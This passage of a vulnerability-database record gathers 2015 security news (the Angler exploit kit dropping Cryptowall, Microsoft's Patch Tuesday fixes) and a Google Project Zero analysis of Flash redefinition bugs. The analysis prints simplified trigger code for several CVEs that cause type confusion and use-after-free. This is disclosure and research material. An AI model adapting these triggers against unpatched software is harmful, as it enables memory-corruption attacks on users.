In a separate instance on Wednesday, he observed Angler sending Cryptowall 3.0 on its own.\n\nBoth times, Duncan claims, the ransomware used the same Bitcoin address for payment. Cryptowall also requested the usual figure, $500, to decrypt the victim\u2019s files.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/05/07003952/2015-05-28-ISC-diary-image-01.jpg>)\n\n\u201cI usually see Angler EK send different types of ransomware, and I\u2019ve seen plenty of CryptoWall 3.0 samples from Magnitude EK; however, this is the first time I\u2019ve noticed CryptoWall from Angler EK,\u201d Duncan wrote in a post on [SANS\u2019 InfoSec Community Forums Thursday](<https://isc.sans.edu/forums/diary/Angler+exploit+kit+pushing+CryptoWall+30/19737/>).\n\nThe exploit kit added yet another Adobe Flash Player vulnerability to its arsenal this week, [according to FireEye](<https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html>). A quartet of researchers noticed Angler exploiting CVE-2015-3090 on Tuesday, [about two weeks](<https://threatpost.com/adobe-unleashes-big-updates-for-flash-reader-acrobat/112756>) after [Adobe](<https://helpx.adobe.com/security/products/flash-player/apsb15-09.html>) actually patched the issue, a memory corruption vulnerability dug up by Chris Evans at Google\u2019s Project Zero.\n\nThe kit uses the vulnerability to exploit a race condition in the [shader class](<http://www.sfml-dev.org/documentation/2.0/classsf_1_1Shader.php>) and trigger the vulnerability, making it possible for attackers to execute arbitrary code and infect the systems of users who haven\u2019t updated yet.\n\nThe addition of Adobe exploits to Angler certainly isn\u2019t new by any means but as FireEye points out, it is worrisome.\n\n[In January ](<https://threatpost.com/exploit-for-flash-zero-day-appears-in-angler-exploit-kit/110569>)the kit added two Flash vulnerabilities, including a zero day that went onto install Bedep on victims\u2019 
machines. In April the kit began exploiting CVE-2015-0359 in Flash and in March it narrowed its sights on CVE-2015-0336, also in Flash, along with [an IE vulnerability](<https://threatpost.com/older-keen-team-use-after-free-ie-exploit-added-to-angler-exploit-kit/111350>).\n\nThe kit matured further in March, adding a nifty trick called [domain shadowing](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>) wherein pilfered domain credentials are used to build lists of subdomains and then used to redirect victims to attack sites.\n", "modified": "2015-06-01T17:43:55", "published": "2015-05-28T13:57:47", "id": "THREATPOST:F5AE68DD67373F4022C1BBC1B5C2DDB3", "href": "https://threatpost.com/angler-exploit-kit-exploiting-new-adobe-vulnerability-dropping-cryptowall-3-0/113044/", "type": "threatpost", "title": "Angler Exploit Kit Exploiting New Adobe Vulnerability, Dropping Cryptowall 3.0", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:02", "bulletinFamily": "info", "cvelist": ["CVE-2015-0345", "CVE-2015-1641", "CVE-2015-1773", "CVE-2015-3043"], "description": "Microsoft has patched a critical vulnerability in the Windows HTTP protocol stack, known as HTTP.sys, which could have devastating consequences once it\u2019s inevitably publicly exploited.\n\nThe bulletin, [MS15-034](<https://technet.microsoft.com/library/security/MS15-034>), is one of four critical bulletins issued today by Microsoft. Experts warn that exploiting the vulnerability is trivial and could lead to remote code execution and privilege escalation on a compromised machine.\n\n\u201cWhat this means is that once an attacker knows how to create the \u2018specially crafted HTTP request\u2019 they can simply start targeting every web server they can find until they hit one that is vulnerable. 
The first concern is that the work around provided by Microsoft is very limited and doesn\u2019t provide IT admins much to protect themselves while they test and deploy the patch,\u201d said Andrew Storms, vice president security services for New Context. \u201cThe second concern is the sheer number of Windows web servers. There are more Linux servers in terms of total numbers but Windows servers are more popular in the corporate environment and many of them store very valuable assets.\u201d\n\nMicrosoft said a temporary workaround would be to disable IIS kernel caching, but cautioned that this action could cause performance issue. The vulnerability is not being exploited in the wild, Microsoft said, adding that it\u2019s found in Windows 7, Windows Server 2008 R2, Windows 8 and 8.1, Windows Server 2012 and 2012 R2, and in Server Core installation option.\n\n\u201cAn attacker can use the vulnerability to run code on your IIS webserver under the IIS user account. The attacker would then use an exploit for a second local vulnerability to escalate privilege, become administrator and install permanent exploit code,\u201d said Wolfgang Kandek, CTO at Qualys. \u201cThe attack is simple to execute and needs to be addressed quickly, if you cannot patch immediately take a look at the suggested workaround in IIS caching. This is the top vulnerability for your server team if you run Windows based web servers on the Internet.\u201d\n\nCraig Young, security researcher at Tripwire, said the flaw appears to be related to IIS kernel caching support.\n\n\u201cIt\u2019s likely that we\u2019ll see this bug being exploited in the wild in a very short timeframe,\u201d Young said. 
\u201cInterestingly enough however, MS15-034 does not affect the older Windows Server 2003 IIS platform, indicating that this bug was introduced in the newer IIS releases.\u201d\n\nWindows admins should also rush a critical bulletin that addresses a publicly disclosed vulnerability in Office.\n\n[MS15-033](<https://technet.microsoft.com/library/security/MS15-033>) patches three vulnerabilities that are rated critical for older versions of Office components such as Word 2007 and Office 2010, but rated important for Office 2013, SharePoint Server 2013 and Office Web Apps Server 2013.\n\nOne of the vulnerabilities, CVE-2015-1641, has been publicly disclosed and Microsoft said there are limited attacks trying to exploit the bug, which is a remote code execution memory corruption issue. There are also a pair of use-after-free vulnerabilities in Office that could lead to remote code execution.\n\nThe bulletin also patches a cross-site scripting vulnerability in Microsoft Outlook App for Mac.\n\nMicrosoft today also patched Internet Explorer. The latest cumulative update for the browser includes a number of fixes for vulnerabilities that were privately disclosed during the [Pwn2Own contest](<https://threatpost.com/all-major-browsers-fall-at-pwn2own-day-2/111731>) last month.\n\n[MS15-032](<https://technet.microsoft.com/library/security/MS15-032>) patches 10 vulnerabilities in IE, including nine different memory corruption issues, and an ASLR bypass, none of which are being publicly exploited. 
The vulnerabilities range from security feature bypass, to elevation of privilege, to information disclosure, to remote code execution.\n\nThe final critical bulletin, [MS15-035](<https://technet.microsoft.com/library/security/MS15-035>), patches a vulnerability in the way Windows processes certain Enhanced Metafile (EMF) graphics and images.\n\n\u201cThe vulnerability could allow remote code execution if an attacker successfully convinces a user to browse to a specially crafted website, open a specially crafted file, or browse to a working directory that contains a specially crafted Enhanced Metafile (EMF) image file,\u201d Microsoft said in its advisory. \u201cIn all cases, however, an attacker would have no way to force users to take such actions; an attacker would have to convince users to do so, typically by way of enticements in email or Instant Messenger messages.\u201d\n\nThere were seven other bulletins released today, all rated important:\n\n * [MS15-036](<https://technet.microsoft.com/library/security/MS15-036>) patches an elevation of privilege vulnerabilities in SharePoint Server\n * [MS15-037](<https://technet.microsoft.com/library/security/MS15-037>) addresses an elevation of privilege vulnerability in Windows Task Scheduler\n * [MS15-038](<https://technet.microsoft.com/library/security/MS15-038>) fixes elevation of privilege vulnerabilities in Windows NTCreate Transaction Manager and MS-DOS\n * [MS15-039](<https://technet.microsoft.com/library/security/MS15-039>) patches a security feature bypass vulnerability in XML Core Services\n * [MS15-040](<https://technet.microsoft.com/library/security/MS15-040>) patches an information disclosure bug in Active Directory Federation Services\n * [MS15-041](<https://technet.microsoft.com/library/security/MS15-041>) patches an information disclosure vulnerability in .NET Framework\n * [MS15-042](<https://technet.microsoft.com/library/security/MS15-042>) patches a denial of service flaw in Windows 
Hyper-V\n\n**Adobe Patches Flash, ColdFusion, Flex**\n\nAdobe released updates today for Flash Player, ColdFusion and Flex. The Flash update patches a vulnerability that has been exploited in the wild, Adobe said.\n\nThe [Flash update](<https://helpx.adobe.com/security/products/flash-player/apsb15-06.html>) resolves 22 security issues, including CVE-2015-3043, a remote code execution bug under attack.\n\nAffected versions are: Adobe Flash Player 17.0.0.134 and earlier versions; Adobe Flash Player 13.0.0.277 and earlier 13.x versions; Adobe Flash Player 11.2.202.451 and earlier 11.x versions.\n\nThe [ColdFusion update](<https://helpx.adobe.com/security/products/coldfusion/apsb15-07.html>), meanwhile, addresses one vulnerability, CVE-2015-0345, an input validation bug that is not under attack, Adobe said.\n\nFinally, Adobe\u2019s Flex ASdoc Tool, also patched one vulnerability, CVE-2015-1773, found in the JavaScript output of the ASDoc tool in Flex 4.6 and earlier, Adobe said.\n\n\u201cThis vulnerability could lead to reflected cross-site scripting,\u201d Adobe said in its [advisory](<https://helpx.adobe.com/security/products/flex/apsb15-08.html>).\n", "modified": "2015-04-16T14:39:33", "published": "2015-04-14T14:49:25", "id": "THREATPOST:0FAFED5DB78FA64CCE60EB40BB4C8915", "href": "https://threatpost.com/microsoft-patches-critical-http-sys-vulnerability/112251/", "type": "threatpost", "title": "April 2015 Microsoft Patch Tuesday Security Bulletins", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:16", "bulletinFamily": "info", "cvelist": ["CVE-2013-0765", "CVE-2014-1705", "CVE-2014-8636", "CVE-2015-0305", "CVE-2015-0327", "CVE-2015-0349", "CVE-2015-3039", "CVE-2015-3077", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "description": "Posted by Natalie Silvanovich = function () { return n; }\n\n \n\n\nECMAScript has a 
property where almost all functions and variables can be dynamically redefined. This can lead to vulnerabilities in situations where native code assumes a function or variable behaves a certain way when accessed or does not have certain side effects when it can in fact be redefined. Project Zero has discovered 24 vulnerabilities involving ECMAScript redefinition in Adobe Flash in the past few months and similar issues have also been discovered in the wild. This post describes how this class of bugs works, alongside some examples of interesting bugs that have been recently patched.\n\n# ECMAScript Redefinition\n\n \n\n\nBeing a dynamically typed language, ECMAScript allows all functions to be redefined. For example, the JavaScript below redefines the alert method.\n\n \n\n\n<script>\n\nfunction f(mystring){\n\ndocument.write(mystring);\n\n}\n\nalert = f;\n\nalert(\u201chello\u201d);\n\n</script>\n\n \n\n\nIn most browsers, this will cause the function document.write to be called instead of a native alert.\n\n \n\n\nWhile this example is fairly benign, in some situations this behaviour can be problematic and lead to bugs. In particular, if native code in the VM relies on an ECMAScript method having specific behavior, but it has been redefined, it can lead to many issues, especially type confusion, overflows and use-after-frees.\n\n# Past Redefinition Bugs\n\n \n\n\nMany security bugs involving redefinition have been discovered in the past. Some of the earliest bugs were bypasses of same-origin-policy in browsers, where redefining a JavaScript function could allow script from an insecure context to be executed. 
Issues of this type have been found as recently as [last year](<https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636>).\n\n \n\n\nIn the past couple of years, many memory corruption and use-after-free bugs of this type have been found in browsers, such as [CVE-2013-0765](<https://www.mozilla.org/en-US/security/advisories/mfsa2013-19/>) in Firefox and [CVE-2014-1705](<https://code.google.com/p/chromium/issues/detail?id=351787>) in Chrome.\n\n \n\n\nThe recent HackingTeam leak contained five Adobe Flash vulnerabilities, of which four involved redefinition ([CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472&can=1&q=reporter%3Ame>), CVE-2015-5122, CVE-2015-5123 and [CVE-2015-0349](<http://www.zerodayinitiative.com/advisories/ZDI-15-134/>)). An analysis of CVE-2015-5119 is included below\n\n \n\n\nHow to Redefine an Object\n\n \n\n\nOne of the main challenges in finding and exploiting redefinition vulnerabilities is reachability. Many of these issues exist deep in code, and it is not always obvious how to trigger them. Moreover, not all ECMA-based languages support redefinition to the same degree, and it often varies based on the specific function and method being redefined. That said, ECMAScript supports many methods of gaining access to objects, so it is often possible to reach redefinition using less-used ECMAScript functionality.\n\n# Equality Operator\n\n \n\n\nThe equality operator is the simplest way to redefine an object or function and it works to some extent in most ECMAScript implementations. In ActionScript 2, it works without restriction so long as a field doesn\u2019t have a setter defined (although sometimes the code doesn\u2019t compile and needs to be written directly in bytecode). Even read-only properties in AS2 can be redefined with the equality operator by calling ASSetProps to remove the read-only flag first. 
In ActionScript 3, only classes that are declared as dynamic can have their methods redefined using equality. In browsers, most methods can be redefined using equality, although one host function cannot be set to another host function directly. For example, in the code at the beginning of this post, alert can be set to document.write, but it needs to wrapped in the function f first. Direct assignment will cause the script to fail to execute.\n\n## CVE-2015-3077\n\n \n\n\n[CVE-2015-3077](<https://code.google.com/p/google-security-research/issues/detail?id=254>) is an example of a vulnerability in Flash that occurs because a function can be redefined using equality. A sample of the code that causes the issue is below. Note that this code has been simplified for clarity, and does not compile. A compiling sample of the code can be found in the Project Zero [bug tracker](<https://code.google.com/p/google-security-research/issues/detail?id=254&q=button>). \n\n \n\n\nvar blur = new flash.filters.BlurFilter(100, 15, 5555);\n\nthis.filters = [blur]; //this is a Button\n\nflash.filters.BlurFilter = flash.filters.ConvolutionFilter;\n\nvar f = this.filters;\n\nvar conv = f[0];\n\nconv.matrix = [0,1,1,1,1,1,1,1,1,1,1,1,1,1];\n\n \n\n\nThis is a simple type confusion issue. When the Button.filters method is set, it creates a native array containing all the filters and stores it. When the Button.filters property is read, it creates ActionScript objects of the type of each filter by calling its ActionScript constructor (with the assumption it hasn\u2019t been redefined) and then setting its native backing object to the one stored in the array. If the constructor for a filter is redefined, it calls the constructor for the wrong filter type, but still sets the same native object. 
This leads to an AS object of one type being backed by a native object of another type, leading to type confusion.\n\n## CVE-2015-0305\n\n \n\n\n[CVE-2015-0305](<https://code.google.com/p/google-security-research/issues/detail?id=150>) is another example of a type confusion issue that occurs through redefinition via equality. \n\n \n\n\nvar b = flash.net;\n\nb.FileReference = q;\n\nfunction q(){\n\nthis.f = flash.display.BitmapData\n\nvar c = new this.f(1000, 1000, true, 1000)\n\n}\n\nvar file = new FileReferenceList();\n\n\u2026\n\nfile.browse();\n\n \n\n\nIt is fairly similar to the previous case. When FileReferenceList.browse is called, the browser spawns a dialog and the user selects files. Then, for each file, the browse method calls the FileReference constructor and creates an object for each file. In this bug, the constructor is overwritten with a constructor that initializes it as a BitmapData object. When the constructor is called, its type is set to FileReference, even though it is not the type that is returned. This leads to an object with an AS object type and native object type that are inconsistent, and therefore type confusion. The bug is that FileReferenceList.browse assumes the FileReference constructor will return a FileReference, even though this isn\u2019t guaranteed because the method can be redefined.\n\n# Proxy Objects\n\n \n\n\nProxy objects can be used in the place of regular objects. They allow functions that handle every property access and method call to be defined. They can sometimes be used to redefine a property where equality fails. They also have the benefit of being able to execute code every time a property is accessed, which can allow behaviour which isn\u2019t possibly when simply setting a property, such as returning a different value each time a property is accessed. 
ActionScript 3 and JavaScript support Proxy objects.\n\n## CVE-2015-0327\n\n \n\n\n[CVE-2015-0327](<https://code.google.com/p/google-security-research/issues/detail?id=223&can=1&q=stringify>) is an issue found by Ian Beer that can be triggered by calling the stringify method in AS3 on a Proxy object. \n\n \n\n\nwhile (index != 0) {\n\nownDynPropCount++;\n\nindex = value->nextNameIndex(index);\n\n}\n\n \n\n\nAutoDestructingAtomArray propNames(m_fixedmalloc, ownDynPropCount);\n\n\u2026 \n\nwhile (index != 0) {\n\nAtom name = value->nextName(index);\n\npropNames.m_atoms[propNamesIdx] = name;\n\npropNamesIdx++;\n\nindex = value->nextNameIndex(index);\n\n}\n\n \n\n\nThe code above is from the open-source AVM. It counts the elements in value, and then uses the length to allocate an array. The array is then set by enumerating the items in value. However, if value is a Proxy object, the number of elements in each enumeration is not necessarily consistent, which can lead to an overflow in the allocated buffer.\n\n# Conversion Operators\n\n \n\n\nConversion operators, such as toString, valueOf and toInt can often be called implicitly. For example, when calling a native method such as:\n\n \n\n\nvar b = new BitmapData(x, y, true, 0xff00ff);\n\n \n\n\nThis will usually call valueOf on x and y to convert them to integers if they are not already. Functions that take string input often display similar behavior with toString. This can be an avenue for executing scripts at unexpected times. 
Conversion operators can be redefined in both AS2 and AS3.\n\n## CVE-2015-3039\n\n \n\n\n[CVE-2015-3039](<https://code.google.com/p/google-security-research/issues/detail?id=244>) is a bug in AS2 where calls to conversion operator allows script to be executed unexpectedly during a native call.\n\n \n\n\nvar filter = new ConvolutionFilter(...);\n\nvar n = {};\n\nn.valueOf = ts;\n\nvar a = [];\n\nfor(var k = 0; k < 1; k++){\n\na[k] = n;\n\n}\n\nfilter.matrix = a;\n\nfunction ts(){\n\nfilter.matrix = a;\n\n}\n\n \n\n\nWhen the native matrix getter is called, it first deletes the existing matrix, then reallocates a new one and then sets its contents to the values in the provided matrix. When it fetches the values from the matrix, it calls valueOf to convert the contents of the array to members of the Number class. However, if the valueOf function also calls the matrix getter, it will delete the matrix array, and reallocate it, even though the previous call isn\u2019t complete, and will write to it after the second call returns. This leads to a use-after-free bug. \n\n \n\n\nCVE-2015-5119\n\n \n\n\n[CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472>) is a bug discovered in the HackingTeam leaks which occurs because calls to a conversion operator can cause a buffer to be freed and reallocated before a write to the original buffer.\n\n \n\n\nvar b = new ByteArray();\n\nb.length = 12;\n\nvar n = new myba(b);\n\nb[0] = n;\n\n \n\n\nIn the myba class definition:\n\n \n\n\nprototype.valueOf = function()\n\n{\n\nb.length = 1000;\n\n}\n\n \n\n\nThis bug is in the AS3 interpreter unlike the AS2 interpreter for the issue above, so valueOf has to be redefined in a class definition as shown. 
The vulnerable code is part of the open source AVM, and is as follows:\n\n \n\n\nvoid ByteArrayObject::setUintProperty(uint32_t i, Atom value)\n\n{\n\nm_byteArray[i] = uint8_t(AvmCore::integer(value));\n\n}\n\n \n\n\nThe AvmCore::integer method calls the valueOf method defined for the object value, which corresponds to the variable n in the ActionScript above. This can then set the length of the byte array, which can cause it to be reallocated. However, the write occurs on the original buffer, leading to a use-after-free.\n\n# Watches\n\n \n\n\nWatches are another method that can be used to change a property of an object. They are supported generically in AS2 and JavaScript. Watches trigger whenever an object property without a custom setter is set. This can sometimes mean that when a native method sets a property, a watch will trigger, allowing a jump into script, and also the ability to change what the property is set to, as a watcher can return a value which supersedes the value that the caller is trying to set the watched field to.\n\n## CVE-2015-3120\n\n \n\n\n[CVE-2015-3120](<https://code.google.com/p/google-security-research/issues/detail?id=337>) is a type confusion issue that can be reached by setting a watch on a variable.\n\n \n\n\nvar fileRef:FileReferenceList = new FileReferenceList();\n\nfileRef.addListener(listener);\n\nfileRef[\"fileList\"] = \"asdf\";\n\nfileRef.watch(\"fileList\", func);\n\nfileRef.browse(allTypes);\n\n \n\n\nfunction func(){\n\nreturn 7777777;\n\n}\n\n \n\n\nSetting a watch on the variable fileList causes the function func to be triggered when the native browse function creates the fileList object and attempts to set it. The function then returns the value 7777777, which is a Number, replacing the object that is set. 
This leads to type confusion when the variable is used, assumed to be an ActionScript object and used as a pointer as opposed to a Number.\n\n## CVE-2015-3119\n\n \n\n\n[CVE-2015-3119](<https://code.google.com/p/google-security-research/issues/detail?id=336>) is a bug in AS2 that can be triggered by setting a watch on a variable:\n\n \n\n\nclass mysubclass extends NetConnection {\n\nfunction mysubclass(a){\n\nthis.uri = \"test\";\n\nsuper();\n\nthis.watch(\"uri\", func);\n\nvar n = {toString : func}\n\nvar s = super;\n\ntrace(y);\n\nthis.connect(y);\n\nvar f = ASnative(2101, 411); //setBufferTimeMax\n\nf.call(this, 1000);\n\nfunction func(a, b, c){\n\nvar f = ASnative(2101, 200); // newStream\n\nvar n = new NetConnection();\n\nn.connect(y);\n\nf(this, n);\n\n}\n\n}\n\n}\n\n \n\n\nA watch is set on the URL property of a NetConnection object, and when it attempts to set the URL, the function func is called. This function redefines the this object as a NetStream (as opposed to a NetConnection), which leads to type confusion. The watch makes this possible, as it occurs after type checking, otherwise the function would fail to execute if called as a NetStream.\n\n# Subclassing\n\n \n\n\nSometimes it is possible to redefine a method or property of a class by subclassing it, if you control the construction of the object. Classes in ActionScript and JavaScript can be subclassed using the extends keyword. In addition, classes can sometimes be dynamically extended using the __proto__ or prototype keyword.\n\n# Resolution Methods\n\n \n\n\nJavaScript and AS2 objects also support resolution methods. These are methods are called when resolution of a property or method fails, as a last resort. In ActionScript 2, __resolve is a resolution function that gets called if resolution of a property or method fails. 
In JavaScript, there is a series of __lookUp*__ methods, such as __lookUpGetter__, which serve the same purpose (the specific method that gets called depends on exactly what type of resolution fails). These functions can be used to redefine methods or properties to reach bugs, but are also useful in finding bugs. Calling a native method on an object with a resolution method set is a good way to figure out what properties of the object the method is accessing, which can then be modified further.\n\n# Conclusion\n\nRedefining host methods and properties can often violate the assumptions made by ECMAScript VMs when they access them. This is a good avenue for finding bugs in this type of software. \n\n \n\n", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806", "href": "https://googleprojectzero.blogspot.com/2015/08/attacking-ecmascript-engines-with.html", "type": "googleprojectzero", "title": "\nAttacking ECMAScript Engines with Redefinition\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "Buffer overflows, memory corruptions, integer overflows, race conditions, restriction bypass.", "edition": 1, "modified": "2015-05-13T00:00:00", "published": "2015-05-13T00:00:00", "id": "SECURITYVULNS:VULN:14490", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14490", "title": "Adobe Flash Player multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}